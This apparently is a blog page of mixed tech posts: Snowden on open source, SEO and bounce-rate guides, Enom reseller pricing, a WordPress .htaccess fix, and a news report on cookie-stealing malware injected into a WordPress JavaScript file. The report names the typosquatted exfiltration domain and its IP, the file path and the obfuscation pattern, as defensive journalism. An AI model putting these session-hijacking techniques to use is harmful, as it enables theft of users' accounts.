Why Edward Snowden loves open source

Published by:

Infamous government hacker Edward Snowden believes open source is a fundamentally better way to use technology compared to proprietary technology that he believes disempowers users.

Snowden was interviewed in the open source cloud computing project OpenStack Summit in Boston via video from a non-descript location and spoke about his personal use of open source technology. In 2013 Snowden, then a government contractor, leaked classified information about government surveillance programs run by the National Security Agency, which brought him worldwide fame.

Speaking specifically about cloud computing technology, Snowden said clouds from Amazon and Google are fine, but noted that customers using these products are “sinking costs into an infrastructure that is not yours… you’re investing into things you don’t control or shape.” Snowden raised the question: “When you’re running things in Google’s cloud, Amazon’s cloud, how do you know when you’re being spied on?” Whether its happening legally or illegally, Snowden argues these vendors could use customers’ informant’sn “at a layer that’s hidden from you.” There have been no credible reports of cloud vendors spying on customers.

Snowden encouraged attendees of the OpenStack Summit to “direct the future of the internet in a more free and fair way.” One way to do that, he says, is to use open source tools to build computing platforms that customers build and host themselves, which gives users more control over how data is handled.

Amazon Web Services explains on the Data Privacy section of its website that customers control their own data. “Customers maintain ownership of their customer content and select which AWS services process, store and host their customer content. We do not access or use customer content for any purpose other than as legally required and for maintaining the AWS services and providing them to our customers and their end users,” the site states. “We never use customer content or derive information from it for marketing or advertising.” Cloud vendors also offer a variety of ways that customers can encrypt data stored in the public cloud, including offering customers the ability to hold their own keys to the encryption.

Snowden is also worried about data privacy when it comes to smartphones and other technologies. “All systems should be designed to obey the user, they should not deceive or lie to the user. They shouldn’t hide from the user,” he said. Snowden said he’s working on open source code projects that allow users to verify the status of their phones, for example, to ensure that when WiFi or networking features are disabled that they truly are.

Snowden said he used a variety of open source tools to facilitate his 2013 leaking of thousands of classified government documents, including the Debian open source operating system and the Tor Project, which helps protect users anonymity.

SESSION HIJACKING, COOKIE-STEALING WORDPRESS MALWARE SPOTTED

Published by:

Researchers have identified a strain of cookie stealing malware injected into a legitimate JavaScript file, that masquerades as a WordPress core domain.

Cesar Anjos, a security analyst at Sucuri, a firm that specializes in WordPress security, came across the malware during an incident response investigation and described it in a blog post-Tuesday.

Anjos says it appears attackers used typosquatting, or URL hijacking, to craft the phony domain, code.wordprssapi[.]com. Typosquatting is a technique that usually relies on users making typographical errors when inputting URLs into a web browser. In this case, the fake site is designed to look like a legitimate WordPress domain so it doesn’t appear out of place in the code.

The researcher said it appeared attackers injected malware into the bottom of a legitimate WordPress JavaScript file designed to reroute sensitive information, such as cookies, to the fake domain.

Denis Sinegubko, a senior malware researcher at Sucuri, told Threatpost Wednesday that it’s likely an attacker took advantage of another vulnerability in WordPress to inject the obfuscated code in the first place.

“Modern attacks rarely use one specific vulnerability. They usually scan for multiple known vulnerabilities (mostly in third-party themes and plugins) and then exploit whatever they find,” Sinegubko said.

Anjos points out that in addition to appearing at the bottom of an actual WordPress JavaScript file – wp-includes/js/hoverIntent[.]min[.]js – the code also uses a typical obfuscation pattern, eval(function(p,a,c,k,e,d). The function, commonly used in JavaScript libraries and scripts, tightly packs code that’s later executed when the page loads.

After Anjos decoded the obfuscated code, he saw the malicious – and now offline – WordPress API site.

In this case, Anjos says a conditional statement hidden at the top of the code excludes cookies from user agents from search engine crawlers. That “extra mile” by the attacker, Anjos says, helps weeds out cookie information from crawlers and bots and “ensures that the data being sent to attackers is more likely to immediately be usable.”

Once it’s been determined the data – in this case, a users’ cookies – are valuable, a script sends it to the malicious site (code.wordprssapi[.]com) so it can be siphoned up and used by attackers, Anjos says.

By stealing a user’s cookies, through what’s essentially a session hijacking attack, an attacker can pretend to be that user and perform any actions the user has permission to perform. At least until those permissions are revoked; something that’s done after a period of inactivity for many types of online accounts, including WordPress.

The site that URL is mimicking, code.wordpressapi[.]com, isn’t even a legitimate site, the researcher points out. But in this case, that doesn’t matter; the fact that it includes the word “WordPress” is enough to make it look like it belongs, Anjos says; that’s what tricks users.

“By purchasing a domain closely resembling a legitimate website platform or service, some webmasters might overlook this in their code and assume it is an official WordPress domain (which it is not),” Anjos wrote.

Sinegubko is a bit puzzled when it comes to who may have been to the malicious site.

“No clue,” Sinegubko said when asked Wednesday, “As always, WHOIS data is ‘privacy protected,’ the IP (45.32.137.126) points to vultr[.]com network (not a typical choice for hackers especially with the Windows IIS/8.5 server).”

In addition to ensuring they have clean code, webmasters should double check sites to ensure they’re not sending sensitive data, like cookies or passwords, to a third party, Anjos says.

“This is something that all webmasters should be aware of when they are auditing their own code. Be careful and always check that a domain is legitimate, especially if it is involved in collecting or sending information to a third-party site,” the researcher wrote.

YouTube Starts Rolling Out New Website Design, Dark Mode

Published by:

YouTube has started to invite its users to preview a new design of its website, which includes a dark mode suitable for nighttime viewing. The design is also more closely aligned to the look and feel of YouTube’s mobile apps, with YouTube product manager Brian Marquardt promising more consistency across platforms in an announcement blog post.

“Starting today, we’re opening up a preview of the new design to a small group of people from all around the world so we can get feedback,” Marquardt wrote Tuesday. “While we hope you’ll love what we’ve been working on, we’re also really excited to involve the YouTube community so we can make the site even better before sharing it more broadly.”

Users interested in the preview could briefly sign up for it on a special web page Tuesday, but YouTube quickly closed the sign-up after reaching an undisclosed threshold. The Google-owned video site promised to invite additional users in the coming weeks, and plans to eventually make the new look available to all users.

In addition to a night mode, which replaces the white website background with a black theme that’s less jarring when used in low-light situations, the new YouTube also uses a somewhat cleaner design. Two separate menus are being merged into one, and individual menu items are spaced more generously, giving the whole site a lighter look and feel.

But one of the biggest changes may be under the hood: YouTube now uses Polymer, a new scripting technology that’s meant to simplify web development. The result could be that YouTube might be able to change up its site more easily in the future.

What This Startup Can Teach CMOs About SEO

Published by:

If you’re a Chief Marketing Officer at a digital business in 2017, chances are a large part of your time is already taken up by dealing with SEO. And thanks to Google’s ever-changing algorithm, what you learn today may not be true tomorrow, meaning you constantly have to stay up to date on the latest algorithm updates and SEO trends. Luckily there are a few constant lessons that remain true throughout algorithm updates and changing times that you can apply to build a future proof site.

The founders of Los Angeles based Everipedia, Inc. noticed that Wikipedia’s model for search engine dominance is ripe for disruption and innovation. They set out to redesign the online encyclopedia for the modern age. To do that, they are required to command a powerful search engine authority similar to Wikipedia’s dominant presence throughout Google’s results. What started out as a small project in a UCLA dorm room has now turned into one of the world’s largest encyclopedias with millions of users and a company valuation of $22 million.

Below, Everipedia’s founders share their most important optimization lessons for CMOs that will help bring your website to the top of Google’s search results.

Focus On Mobile Design And Usability

In 2016, mobile overtook desktop as the primary device people use to browse the web and Google has been quick to update their algorithm to make it more mobile oriented. Many industries and websites are starting to see their percentage of mobile traffic steadily climbing. But even though responsive design has been around for a while now and is well- established, a majority of websites tend to fall short on their mobile usability.

Theodor Forselius, the Head of Design describes what they have done in regards to mobile optimization: “At Everipedia we have actually focused more on our mobile functionality and usability than we have on desktop. All of our pages on mobile are built with Google’s Accelerated Mobile Page(AMP) framework which gives our pages priority in Google’s SERP over competitors.

The AMP framework also significantly improves our page speeds on slow 3G/4G connections which in turn decreases the bounce rate and signals Google that the page is user friendly.”

The lesson for CMOs: If the desktop version of your site is better than the mobile version, your priorities are misplaced.

How to fix Wp-admin redirects to wp-login.php which goes to 404 not found page

Published by:

I had several web sites where when I tried to login with wp-admin it used to redirect to wp-login.php which gave a 404 not found error I did all I could some of the things which I did were

Completely reinstalled the wordpress with fresh files

Upgraded my sqil database

changed the site urls in the database

Completly rewrote the wordpress .htaccess text

Nothing worked finally a video posted on you tube gave a solution which was much easier and worked perfectly

All I had to do is add the following code in .htaccess file at the end and it worked perfectly

<Files wp-login.php>
Order Deny,Allow
Deny from all
Allow from all
</Files>

This was it this worked and I was able to fix this untiring error that had kept me from posting to my web sites.

You can change the .htaccess file via ftp or via cpanel file manages.

Enom increasing prices for the domain names for resellers

Published by:

One of the most popular and reliable company for domain names has finally decided to hit in its feet. The company has sent emails to the clients that it will change its pricing stucture and will increase the prices for US$ 8.50 to 13.48 per domain

They have said in their email

“After numerous conversations with our resellers, we’ve come to understand that Enom’s existing reseller pricing plans could use some streamlining and simplification.

We spent the last 90 days analyzing how you and your customers buy, what they pay, and how we can help you drive better profitability. As a result, we are dropping some extension prices, raising others, and discounting a domain add-on that can boost your bottom line.

These changes will go into effect automatically requiring no additional action on your part.”

This move of the company in my opinion is going to be a desaster for it. It seems the company has hit its highest lever in its lifecycle and and wishes to plunge downwards. The sharp increase in prices will force resellers to move their domains to other cheaper resellers like reseller club etc. Our rate with them is 8.5 dollars and now they will convert it to Silver and new rate is 13.48 this means I will need to charge clients 15 some dollars per year for the .com domain. This will make it impossible to sell domains in a market where companies like 1and1 anad godaddy offer 2 to 8.5 dollars per domain per year.

In case if you need an alternative account for your domains which is comparable to old enom prices please email us at oanhwar @ gmail.com

According to enom the change in prices will take effect on 15, 2016, prices on TLDs such as .com, .net and .org will increase,

Here is the new pricing slabs for different extensions for the enom re-sellers.

 

New Pricing
.COM .NET .ORG .BIZ .INFO
Platinum $9.98 $11.98 $11.48 $11.98 $11.48
Gold $11.48 $13.98 $12.98 $13.48 $12.98
Silver $13.48 $15.98 $14.98 $15.48 $14.98

As noted above, we’re also lowering prices on many ccTLDs and new generic TLDs. These extensions are set at a base price and aren’t affected by your pricing tier:

TLD New Price TLD New Price TLD New Price TLD New Price
.IT $14.95 .IN $14.95 .ORG.TW $24.95 .NET.NZ $34.95
.JP $54.95 .TW $24.95 .GS $39.95 .ORG.NZ $34.95
.BE $7.95 .COM.TW $24.95 .MS $39.95 .COM.MX $49.95
.AT $18.95 .IDV.TW $24.95 .DE.COM $24.95

 

TLD New Price TLD New Price TLD New Price TLD New Price
.ACTOR $27.50 .ENGINEER $22.00 .MORTGAGE $33.00 .VET $22.00
.AIRFORCE $22.00 .FORSALE $22.00 .NAVY $22.00 .RIP $13.20
.ARMY $22.00 .FUTBOL $8.80 .NINJA $13.20 .BAND $16.50
.ATTORNEY $27.50 .GIVES $22.00 .PUB $22.00 .SALE $22.00
.AUCTION $22.00 .HAUS $22.00 .REHAB $22.00 .VIDEO $16.50
.CONSULTING $22.00 .IMMOBILIEN $22.00 .REPUBLICAN $22.00 .NEWS $16.50
.DANCE $16.50 .KAUFEN $22.00 .REVIEWS $16.50 .LIVE $16.50
.DEGREE $33.00 .LAWYER $27.50 .ROCKS $8.80 .STUDIO $16.50
.DEMOCRAT $22.00 .MARKET $22.00 .SOCIAL $22.00 .FAMILY $16.50
.DENTIST $27.50 .MODA $22.00 .SOFTWARE $22.00

 

Can we keep doing same for SEO in 2016 as we did in 2015

Published by:

 

Jayson DeMers

By Jayson DeMers Founder & CEO AudienceBloom

The SEO industry is volatile, and every month something new seems to shake up the scene and force us to reevaluate our priorities.

Best practices in 2010 don’t have much in common with best practices today, yet we believe that many of today’s best practices will be relevant indefinitely.

As we near the end of 2015, it’s important to consider which elements of your SEO campaign will be relevant throughout 2016 and which ones might expire or change in unfamiliar ways.

What’s changing?

In 2015, we witnessed a host of changes to the SEO landscape, from tweaks to ranking factors to shifts in potential visibility. In 2016, I’m anticipating more changes along these lines.

By looking back, we can determine Google’s (and other search engines’) priorities, and use those to estimate changes that are around the corner.

Social media will become more important for search visibility

Currently, social media probably plays a minimal role in directly influencing your rankings, though it likely plays strong indirect roles in doing so.

Greater social signals (such as users sharing your content or interacting with your brand) can help you rank higher, but for the most part social media serves as a great external channel to generate more inbound traffic for your site.

However, Google and other search engines are working harder to incorporate social media posts in new ways. For example, Twitter tweets are now embedded in certain search results.

google-embededresults

As this trend continues into 2016, posting on social media will continue to grow in importance to search visibility, though probably not in direct correlation to your site’s rankings.

‘Desktop-focused SEO’ will begin its descent into irrelevancy

In 2015, mobile traffic finally surpassed desktop traffic, and Google released its so-called “Mobilegeddon” update to phase out any sites that weren’t optimized for mobile devices. 2015 was the year mobile became the dominant form of web traffic, and 2016 will be a continuation of the rise of mobile.

Google’s own John Mueller stated this year that mobile-only sites (i.e., sites without a dedicated desktop version) suffer no ranking penalty.

Google has all but abandoned desktop-focused SEO, and you should too as we move into 2016.

Information-based content traffic will cease

Content that provides general information is becoming obsolete. This is in part due to the fact that online content is becoming oversaturated, but even more so due to new technological developments like the Google Knowledge Graph and Windows’ Cortana.

Digital assistants and advanced algorithms can now give users immediate information without ever routing them to an external site.

Instead of trying to write about that general information, shoot for more niche, unique topics.

google-answers

External links will change

External links have been shrinking in importance for the past three years or so, but new forms of link building have arisen. Brand mentions, which don’t use any explicit link, and off-site reviews are serving as new forms of off-site authority building.

Even newer forms of link building, like links to specific sections within apps, will grow in importance in 2016.

Local SEO will evolve further

The big local SEO shakeup in 2015 was the introduction of the local 3-pack, but thanks to increased interest in wearable technology, greater activity of local businesses, and general consumer needs, expect to see more local SEO changes in 2016.

Reviews and local citations will become more important, and geographic-based searches will become even more specific, serving at the neighborhood level instead of a city or region.

What’s staying the same?
Now that we’ve seen all the ways SEO may change in the next year, I’d like to focus more on what’s staying the same.

I’d like to believe that certain best practices really are timeless, or at the very least, that some best practices have a few more years left in them.

Keep these practices central to your SEO campaign well into 2016, as they aren’t in any immediate risk of being phased out:

Content is still king. Despite some forms of information-based content starting to lose out to digital assistants and aggregated material, unique, quality content is still your best friend.

People still need opinions, insights, entertainment value, and personality and it’s still going to be your job to give it to them in 2016.

On-site optimization is still about user experience. Some on-site factors are growing or shrinking in importance. For example, site security will be even more important in 2016.

But the bottom line is that on-site tweaks are still focused on user experience. If a change would make your site faster, safer, and easier to use, it’s probably good for SEO (and even if it isn’t, it will help your conversion rates).

Authority building still occurs off-site; to build a reputation, you still need off-site signals like inbound links, social signals, and reviews.

As I mentioned above, the nature of external links is evolving, but brand mentions, off-site listings, and consumer reviews are filling that gap as a new form of off-site authority building. The more relationships you can build with off-site authorities, the better.
Obviously, there are more best practices than these to consider when you’re structuring an SEO campaign for the future, but these blanket concepts will help you understand your main priorities.

There’s a significant degree of uncertainty with these predictions, as historic trends and patterns of growth don’t necessarily dictate a consistent future, and timing, of course, is sensitive to hundreds of unseen variables.

One thing is certain, however; SEO in 2016 will not be the same as SEO in 2015. Technologies, systems, and trends change too rapidly to support any one set of goals or practices for long.

Stay cognizant of industry-related changes and work quickly to adapt when things shift—as long as you keep a reasonable pace of development, you should have no problem outperforming the competition.

How to Fix & Prevent Duplicate Content Issues

Published by:

International SEO is becoming increasingly important for online companies to meet their ultimate aim of growth. Due to the Internet, expanding your business to any country in the world is fortunately a click away. All you need is an optimized website that caters to audience across national borders. However, doing so without duplicate content can be easier said than done.
First, there’s the major problem of a language barrier. There are also international search engines that go well beyond Google and Bing. For example, Yandex is the preferred search engine in Russia and Baidu is popular in China. Even when you simply translate your content into different languages, you risk being penalized by Google and other search engines for duplicate content. In this article, I’ll look closely at the common content issues businesses commonly face with international SEO.
Debunking Myths About International Seo

clip_image002
Let’s start by bursting some popular myths circulating around the international SEO realm so that you can stay on the right track.

Myth 1: There’s only one way to effectively penetrate a different country market and this is achieved through different domains.
Fact: All you need is a website that gives out good signals in a particular region, or globally for that matter. There are three approaches for doing so: sub-directory, sub-domain, and ccTLD. You can choose any one according to your business’s budget and team.
Myth 2: You should buy the maximum number of domain names.
Fact: Remember that buying multiple domain names is okay until you’re doing so to cover common misspellings of your brand. Beyond that, multiple domain names hold no real value. In fact, I would venture to say that they’ll hinder your international SEO efforts. Page redirections weight heavily on your website by slowing page download times.
Myth 3: You need .com domains to facilitate the creation of subfolders meant for international SEO.
Fact: The common notion that .com is foolproof when it comes to targeting international traffic is false. Businesses can create subfolders in other gTLD’s such as.org and .net. You can also choose to go with ccTLD.
Myth 4: Domain names with keywords can’t fail.
Fact: Having keywords in the domain name doesn’t guarantee traffic. I recommend you to focus on building your brand instead of hunting for such exact match domains.
Myth 5: Google Translator is a perfect tool.
Fact: At its current form, Google Translator is far from being flawless. Ideally, you hire an expert fluent in the foreign language to translate the content on your behalf for better results.
Myth 6: Keywords are the same worldwide.
Fact: This is a major misconception that can drag down your business because keywords vary by region. For instance, singulars and plurals end differently in German. Use a tool like Ubersuggest to zero in on the right keywords for your international SEO campaigns.
Myth 7: One approach for all countries will work.
Fact: Our globe is extremely diverse, so your marketing campaign needs to change based on each culture’s uniqueness. Keep in mind that holidays and festivals vary from country to country.
The Major Issue In International SEO

clip_image004
First and foremost, the biggest problem that comes in international SEO is finding the right approach to target different countries. Second, most businesses face challenges in avoiding the problem of duplicate content. Writing unique content for each page per the location isn’t the best approach. This will affect your budget costs and squeeze valuable time.
Avoiding Duplicate Content in International SEO

Before I get into the topic of duplicate content, you must understand that you can create either a multilingual website or multi-regional website. Here are the differences:

Multilingual website: Multilingual websites offer content in more than one language. For example, your website could include two language versions in Latin and English. Yet, you might still target users in the United States only.
Multi-regional website: Multi-regional websites target customers from different regions. In this case, you might have two versions of your website for two regions. One version might be targeting the UK, whereas the other version targets the US. Both would be in English. Of course, you could also have two versions for two regions in two different languages.
How to Manage Multilingual Versions on Your Website?

Content in different languages is not considered duplicate content if it’s done manually with correct grammar and intent. However, using auto-translated text from tools like Google Translator may create duplicate content issues. You can use robot.txt to block the search engines from indexing automatically translated pages, which can help avoid duplicate content. When Google indexes incoherent text, it might regard such content as spam and block the page. Steer clear of translating boilerplate content into different languages as it negatively affects user experience and isn’t acceptable by search engines.

For international SEO, it’s best to use a single language with a navigation tab for visitors to choose any language they speak. Text should be manually translated. Ensure that each language version can be discovered easily. Refrain from using cookies to guide a user from one language to another. Automatic redirection is also a bad idea because it prevents visitors from exploring the website the way he or she wants. It can also limit the search engines from indexing your website in its entirety. Use interlinking between languages so that users can land on the right language with a simple click.

Preferably, your URL should tell the user what language they’re getting. If you want a French user to click on the French version of the text, the URL must contain French words without any English. Google doesn’t use code-level information like the “lang” attribute to understand a website’s langauge. The search engine reads the content of the page to understand it. I’ll cover how to use the hreflang tag instead to guarantee 100 percent safety.

Targeting a Specific Country

Google encourages website owners to inform them of their targeted countries for enhancing search results. The search engine has set aside the following elements of international SEO for this purpose:

ccTLD (country-code top-level domain): Each ccTLD relates to a specific country. For instance, .com.au is used for Australia, .in is used for India, and .de is used for Germany etc. Using the appropriate ccTLD will give Google the clear indiciate that your business is targeting a particular nation.
Location of the server: Though the location of the server is not always a definitive indicator, Google takes it into consideration using the IP address. Google does understand that some websites make use of content delivery systems and may be hosted in a different country to provide better web server infrastructure.
Use geo-targeting carefully: Geo-targeting is an international SEO tool that can be used to define the targeted country present in the search console. But, you must be careful with it. If you are targeting countries by using ccTLD, then it doesn’t make sense to use it. Geo-targeting is usually used by websites with gTLDs, such as .com or .net. It makes the most sense for generic top-level domain names not affiliated with countries.
Don’t ignore your address and phone number: You do not get more local than your address and phone number. Having a physical international address will boost your authority. This is where Google My Business plays a big part.
Tackling Duplicate Content on International Sites

clip_image006
It’s common for websites to provide similar or the same content in different languages when targeting different regions while having different URLs. Google is okay with this as long as the users are from different countries. Your website will not be penalized when translation is manual and accurate. Even though Google still prefers unique content for each version, it understands that having unique content can be quite tough. Google clearly states that you don’t need to hide such content by not allowing Google to crawl it using a robots.txt file or no index robots meta tag.

The circumstances are entirely different if you’re providing the same content to the same audience through two URLs. Let me explain this with an example. Imagine you’ve created yourbusiness.com and yourbusiness.com.au. One targets the USA and other targets Australia respectively. Since both are in English, this will cause duplicate content. Luckily, it can be easily solved using a hreflang tag, which is widely accepted by all search engines globally.
Using the “Hreflang” Tag

As I mentioned earlier, the hreflang tag protects international SEO campaigns from being penalized with duplicate content. It’s usually required by businesses that cater to different languages or countries through sub-domains, subfolders, or ccTLD. The hreflang tag also is important if you have multiple languages for one single targeted country. Here’s how you can go about implementing it:

Step 1: First, we must handle language targeting. You’ll have to list out the URLs that have equivalents in different languages. Any stand-alone or non-equivalent URLs would not need the hreflang tag, so don’t list them.
Step 2: Now comes setting up the tag. This is what a general hreflang tag looks like:
<link rel=”alternate” hreflang=”es” href=”http://es.general.cz/”/>
Let’s envision that the page in question is www.mysite.com/page2.html and you want a German version of it.
You’ll simply change it to
<link rel=”alternate” hreflang=”de” href=”www.mysite.com/de/seite2.html”/>.
For a Spanish version, you’d change it to
<link rel=”alternate” hreflang=”es” href=”www.mysite.com/es/pagina2.html”/>
All you need are the country-wide codes. Repeat the process for the URLs that you narrowed down during step 1. For having a site that targets different countries in same language, you’ll use code like:
<link rel=”alternate” hreflang=”x-default” href=”http://www. xyz.com/”/>
<link rel=”alternate” hreflang=”en-gb” href=”http://en-gb. xyz.com/page.html”/>
<link rel=”alternate” hreflang=”en-us” href=”http://en-us. xyz.com/page.html”/>

Here the hreflang=”x-default” is used to create a default common page for all countries. This is generally the homepage or another neutral page for all countries.
Step 3: Please note that the hreflang tag should only be placed before the closing of the </head> tag and the tag of self-page shouldn’t be added. For example, the page
http://en-gb. xyz.com/page.html
Should only contain the alternate versions like

<link rel=”alternate” hreflang=”en-us” href=”http://en-us. xyz.com/page.html” />

and for page http://en-us. xyz.com/page.html/, the tag should be.

<link rel=”alternate” hreflang=”en-us” href=” http://en-gb. xyz.com/page.html” />

After implementation you can check that what you’ve done works properly by logging into your Google Webmaster Tool account. Proceed to “Search Traffic” and then “International Targeting.” If the hreflang tags were placed properly, you’ll be able to test them utilizing the feature presented there. When problems ensue, try using the hreflang tag generator tool to make things easy.
Common Mistakes to Avoid

Incorrect use of language codes: All tags should contain codes as per ISO 639-1. Using incorrect ones will negatively impact your international SEO.
Missing confirmation link: If page A links to page B, page B must link back to page A with a proper hreflang tag.
Challenges with Canonical Tags

The purpose of the canonical tag or rel=canonical is simple. Consider you have two pages with different URLs that have exactly the same content. Here you would place a canonical tag on one page so that Google only indexes that. Yet, there are several problems that can arise when using the canonical tag.

From what you’ve read so far, there’s no doubt that the hreflang tag is used for geo-targeting. Canonical tags are used to solve duplication issues. However, with canonical, you must have a preferred version of the web page. For you, this means spending a lot of time, effort, and likely cost. Rel=alternate hreflang tags have an advantage. They can be keyed in with ccTLDs to inhbit users from getting the notion that they need a .com. ccTLDs are more apt at achieving better results.
What the Hreflang and Canonical Test Tells Us

State of Digital put hreflang and canonical tags to the test. Here’s what their study found:

Hreflang is suited for international SEO.
When you encounter problems with duplicate content, it’s okay to combine hreflang and canonical tags.
In the absence of problems with duplicate content, you shouldn’t combine hreflang and canonical tags.
As the person in charge of international SEO, there’s no doubt that you’d be quite busy the year round. Hopefully the information gained here will be useful in steering clear of costly penalties and de-rankings from duplicate content. If you have additional international SEO tips or have unanswered questions, please feel free to use the comment box below.

How to reduce your site’s bounce rates

Published by:

Bounce rates tell you what percentage of people left a given page on your website without viewing any other pages. It’s not to be confused with exit rates, which simply tell you the percentage of visitors that left the site from a page (i.e. they may have viewed other pages first).

Also, it’s important to be aware that users could spend 10 minutes on your page before they leave the site.

In this scenario, it could well be that the page has fulfilled its purpose (or that the user has just forgotten to close it).

What do bounce rates tell you?

It’s generally used, along with other metrics, as a measure of a site’s ‘stickiness’.

For example, on SEW, I’d like people to click on a link from search, Twitter or some other referral source, find a useful article, then decide to browse further and view all of our other lovely content.

If bounce rates are high, it could mean that our content isn’t doing its job properly, though there are plenty of other possible explanations.

As a rule, I’d generally look at trends over time, and use bounce rates as one of several metrics for measuring the success of a particular page.

For example, this Google Analytics custom segment looking at the percentage of visitors viewing multiple pages provides a measure of a site’s ability to retain users’ interest beyond the page they land on.

page-depth-ga

Other measures, such as average time on page or using event tracking to see how many people read to the bottom of your posts (as described here by Justin Cutroni) can also help.

Still, the principle is important. If you’re the kind of site that wants people to stick around for a while, bounce rates provide a good general guide.

What exactly a good bounce rate is will depend on the type of site you’re running.

Working in online publishing, my experience is that bounce rates for articles can be as low as 40% and as high as 98% for individual articles. The average would vary between 70% and 85%; obviously I’m aiming for nearer 70%.

The Google Analytics screenshot below shows some of the more ‘evergreen’ articles we’ve published. As we can see, the bounce rates for such articles are lower than the average, which is nearer 80%.

bounce-rates-sew

Is a high bounce rate always a bad thing?

In a word, no. It can depend very much on the purpose of the website.

For example, people may want to quickly find a contact number or check facts. If the site enables them to find this information easily, they’ll leave quickly, thus pushing up the bounce rates.

I may need to know how old Al Pacino is (as you do). I can Google his name, click on Wikipedia, and the information is instantly available on the right of the page. Then I hit the back button.

pacino-wikipedia

Of course, I could linger longer, read more and click some of the links, but if that’s all I want to know, I’m playing a small part in increasing the site’s bounce rates.

For publishers like Search Engine Watch, we’d rather keep people on the site longer so, if someone clicks on the page, decides they’d rather not read the article in question and leaves, then that may mean we haven’t delivered on their expectations.

In the latter case, high bounce rates are a bad thing.

The relationship between bounce rates and SEO

Of course, Google doesn’t know your bounce rates, though it theoretically can find this information from the millions of sites that use Google Analytics.

In theory it would be a useful ranking factor, as it is an indication of how relevant your landing page is to the user’s search query, though allowances would have to be made for the type of site and query.

If someone wants a guide to landing page design and bounces within seconds we can assume the page hasn’t delivered. However, if they just wanted to quickly check the weather for today, then maybe it has served its purpose.

The concept of dwell time, or the ‘long click’ (as explained here by Bill Slawski) is important. It’s similar to – but not the same as – bounce rates. It’s essentially a measure of how long a user spends on a page before returning to the search results page.

Whether this is a ranking factor or not is open to debate, but it certainly makes sense in the light of Google’s search for quality signals.

In essence, it works like this:

If a user clicks through from the SERPs onto a website and then spends some time there, it suggests that the result was relevant to the query and served its purpose. In this case, Google has done its job well in ranking said website highly.

If a user clicks through and then returns to the search results page quickly (or then selects another result) then it suggests the site has not been useful for the searcher. Therefore another site may usurp it in the rankings.
Of course, this is a simplified version, and there are variables. For example, what if the site answered the query immediately (as in my Al Pacino example)?

I would assume that Google would be able to find different metrics for different types of search query so that it could take account of this.

How to reduce bounce rates or how to keep visitors on your site for longer

The following factors should help to reduce bounce rates, but also should serve to keep users on site for a longer period. Or at least remove factors which will make them leave the site.

Here we are, in no particular order…

1. Make sure your pages load quickly

No-one likes slow loading pages, so make sure yours run as fast as they can, on mobile and desktop.

The old rule of thumb from Jakob Nielsen was that users would wait two seconds for a page to load before abandoning the idea. Whatever the exact time, if a site feels slow to load, people will be thinking about bouncing.

This is important from a user experience perspective, but also forms part of Google’s mobile ranking factors.

It looks like we have some work to do on that score…

page-speed-sew

2. Give visitors all the information they may need

This is a point which perhaps applies to ecommerce more than other sites.

Let’s take an example from the travel sector. If you’re researching hotels to stay in, then the obvious destination for many web users is TripAdvisor.

There they can find (in theory) impartial views on the hotel which cut through the sales pitch on the hotel or travel agent’s website. However, once on TripAdvisor, they may be swayed by other hotels.

If you have reviews on site though, or have integrated TripAdvisor reviews on the page, then one reason to head elsewhere is removed.

Here, Best Western hotels show TripAdvisor reviews (good and bad) on hotel pages:

bw-reviews

3. Avoid clickbait

Clickbait is commonplace now. In fact, it’s hard to find a news publisher’s site without this kind of garbage following articles.

promoted-links

If you’re foolish enough to click one of these links you’ll find yourself on some of the worst sites on the web, full of pop-ups, pagination and lots of attempts to trick you into clicking on ads. There’s also the question of why publishers would want to send their audiences there, but thats an issue for another article.

Essentially, none of these posts are likely to deliver on the promise of the headline. The content needs to be relevant to the headline, or else people will bounce quickly.

I’m not against lists or using headlines to attract clicks, which is why this article has the headline it does. It’s just that headlines have to deliver on their promises.

4. Avoid huge pop-ups and annoying ads

Serving users with a huge pop-up as soon as they enter the site is a great way to make them hit the back button.

Likewise, intrusive rollover ads and autoplay audio are what make web users turn to adblockers. It will make many others bounce as soon as they reach your site.

5. Use internal linking

I’ve written about the use of internal linking as an SEO tactic, but it performs an important role in keeping people on site for longer.

Providing users with links to other interesting articles which are relevant to the one which users are reading increases the likelihood that they’ll hang around for longer, and reduces those bounce rates.

6. Be careful with external links

I’m all for giving credit when its due when it comes to links, but if you add external links early in a post and don’t open them in a new window, you’re essentially asking users to your site and inflate your bounce rates.

7. Do not use pagination

This could actually be posited as a way to reduce bounce rates, but I think the drawback of annoying users outweighs this particular aim.

People can scroll, so there’s no need to paginate. The only reason I can think of is to falsely inflate page views.

pagination-nyt

8. Site design

Users will form an opinion of your site the minute they land on it, and much of this is down to the design.

Your search result or tweet may have convinced them to click, but bad design (or at least design that doesn’t appeal to the visitor) can convince them to leave.

For example, an ecommerce site should convey a certain level of professionalism if you’re asking users to trust their credit card details to you.

This site may sell the very best gates and fences, but the design doesn’t exactly convey professionalism. It’s also very hard to read.

gatesnfences

(Hat tip to Branded3 for the example.)

9. Article formatting

This is very important. Just as people make quick judgements based on site design, they’ll also look at the article or page they clicked on and wonder how much work it will be to read and consume.

A wall of text with few paragraphs and no visual stimulus will deter many people just because it seems like hard work to digest.

wall-of-text

On the other hand, if you have clear sub-headings, bullet points, images and charts, and bold text on key stats and points then it makes even longer articles seem more appealing.

Of course, the content should deliver, but first impressions matter in this respect.

10. Mobile-friendly pages

An obvious point. If you want mobile users to stay a while on your site, then make sure it’s mobile-optimized.

11. Site search and navigation

Site search provides an easy navigation option for visitors.

On ecommerce sites, site search users often convert at higher than the average rate, as using it can indicate a greater intent to purchase.

On other sites, search provides users with an alternative way to navigate through sites, one that some web users prefer.

Give people easy and clear ways to navigate around your site. Make navigation intuitive and consistent.

12. Related content recommendations

This is about giving people ideas for other content or pages based on the article they’re reading.

We use them here on SEW, based on the main topic. You’ll see it down the page, between the author bio and the comments.

This may not be the best example of content recommendation in action, but the idea of providing content relevant to the current article is a good one.

sew-related-content

13. Most read/commented boxes

This is another form of content recommendation, based on the articles being read or shared. Here’s an example from the BBC:

most-pop

We have something similar here, a trending posts box. You may or may not have noticed it…

The point of these is that they give users further ideas for reading, whether looking at the posts with the largest number of comments, or those with most views.

14. Make calls to action clear on landing pages

You have to make it clear where customers need to go next to buy a product, retrieve a quote, or whatever action you want them to take.

Here are some general pointers:

Wording. The wording you use should make it obvious what will happen if a user presses a button, such as ‘Add to cart’ or ‘Checkout.’
Colours. Test to see which colours work best. Contrast is key. Many sites tend to go for yellow or green, but what works for one site doesn’t necessarily work for another.
Size. Make them big enough to be seen easily, but not too big.
Placement. Buttons should be placed where users’ eyes are likely to be as they scan around the page.
Adapt for different devices. Calls to action should work across various mobile devices as well as desktop.
